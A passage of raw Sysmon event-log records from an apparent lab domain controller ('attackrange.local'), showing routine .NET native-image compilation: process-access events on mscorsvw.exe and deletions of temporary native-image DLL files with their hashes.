AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6IT7R10KBG\Microsoft.Management.Infrastructure.CimCmdlets.ni.dllMD5=C42E4041FEE208A1FB42DBD6AA3079A0,SHA256=A25D35E66248D804A11B5E4688E1A0AFD88A021C59A6C0FF204D1CFA0506C797,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022901Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.418{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A275-60D3-5105-00000000CF01}3980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022900Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.402{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A275-60D3-5105-00000000CF01}3980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022899Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.402{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A275-60D3-5105-00000000CF01}3980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022898Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.402{4DB9351A-A275-60D3-5005-00000000CF01}6388NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\I3MIV3MCRX\Microsoft.Management.Infrastructure.ni.dll.auxMD5=FACF74F69F57E0556F5250076D8D321C,SHA256=3D4CABD9A63EC1F7C9A1AEBF001B2E1199838647D20D0E52F9E137E51EF85C02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022897Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.402{4DB9351A-A275-60D3-5005-00000000CF01}6388NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\I3MIV3MCRX\Microsoft.Management.Infrastructure.ni.dllMD5=91B63EA7F56D6BDD2263CCF6F314BE38,SHA256=6024CD0CD257A5FD95E82C121AC72CAAE42521954380A02E03C21DF6EBBAF018,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022896Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.386{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A275-60D3-5005-00000000CF01}6388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022895Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.371{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A275-60D3-5005-00000000CF01}6388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022894Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.371{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A275-60D3-5005-00000000CF01}6388C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022893Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.355{4DB9351A-A275-60D3-4F05-00000000CF01}3576NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\TTSQ57K7IR\Microsoft.KeyDistributionService.Cmdlets.ni.dll.auxMD5=C6B4009C76013ADF5C2CE237AB0E70E1,SHA256=694D160900A42EE796C19D927B5FA1E6839C1193EBC2902797E26A8A4F6E384A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022892Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.355{4DB9351A-A275-60D3-4F05-00000000CF01}3576NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\TTSQ57K7IR\Microsoft.KeyDistributionService.Cmdlets.ni.dllMD5=BF7F17A2DD7641D10352A6DCE5E95FE0,SHA256=4CDAD9601ED83F088319C11BE3F60852C1E3016586E727ACAE8B10D1290BFF6D,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022891Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.339{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A275-60D3-4F05-00000000CF01}3576C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022890Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.324{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A275-60D3-4F05-00000000CF01}3576C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022889Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.324{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A275-60D3-4F05-00000000CF01}3576C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022888Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.324{4DB9351A-A275-60D3-4E05-00000000CF01}5756NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\2KI59KJQC3\Microsoft.Iscsi.Target.Commands.ni.dll.auxMD5=FF070861C99D233752155D95020424E9,SHA256=3B8799708FF96447D0F10220BA6D0230466210ADE3FA542DD1010A6926B94FC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022887Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.324{4DB9351A-A275-60D3-4E05-00000000CF01}5756NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\2KI59KJQC3\Microsoft.Iscsi.Target.Commands.ni.dllMD5=487837EC7141E7EE4278135B9782592D,SHA256=45C4581AFA70D39C921AFEA84745354E7377F4221F01C6BD90556D28EFE02D04,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000022886Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.308{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A84CD2FF60D4B54EBD1C1927EAA9FEB,SHA256=CBC039825BBC2D28BA7E549020A6F913D4DC9B086D1F558307558E71EA237348,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022885Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.293{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A275-60D3-4E05-00000000CF01}5756C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022884Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.277{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A275-60D3-4E05-00000000CF01}5756C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022883Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.277{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A275-60D3-4E05-00000000CF01}5756C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022882Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.277{4DB9351A-A275-60D3-4D05-00000000CF01}5844NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\TGJX50230K\Microsoft.Isam.Esent.Interop.Wsa.ni.dll.auxMD5=CF70E372152A306E9211D962FB15FC1A,SHA256=906B674B204598CB9530AF1250880F3706A66051B648B45E3BBF98C4D03A8605,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022881Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.277{4DB9351A-A275-60D3-4D05-00000000CF01}5844NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\TGJX50230K\Microsoft.Isam.Esent.Interop.Wsa.ni.dllMD5=E54F3681BE254E83839EDA79DEBDDEB8,SHA256=2504B8CB5F8F76D4917A0D8FFC88726E51C26C81940ED27D265742665FCE2EF5,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022880Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.246{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A275-60D3-4D05-00000000CF01}5844C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022879Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.230{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A275-60D3-4D05-00000000CF01}5844C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022878Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.230{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A275-60D3-4D05-00000000CF01}5844C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022877Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.230{4DB9351A-A275-60D3-4C05-00000000CF01}6640NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\OG2I8229U5\Microsoft.Isam.Esent.Interop.ni.dll.auxMD5=CDA1A0E496A2AE74A75BBB4F15A4A511,SHA256=F9B7FC9AE656FEABCBB29B4E87F216092ACA9CE6079F67A292280DF15047DCDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022876Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.230{4DB9351A-A275-60D3-4C05-00000000CF01}6640NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\OG2I8229U5\Microsoft.Isam.Esent.Interop.ni.dllMD5=31834503F4C1E0EF5E33250770E92D9E,SHA256=44A598528485900376C593BEF0C256C0A530AC06EE5F2A1ACDA78D41B0A90202,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022875Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.199{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A275-60D3-4C05-00000000CF01}6640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022874Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.183{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A275-60D3-4C05-00000000CF01}6640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022873Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.183{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A275-60D3-4C05-00000000CF01}6640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30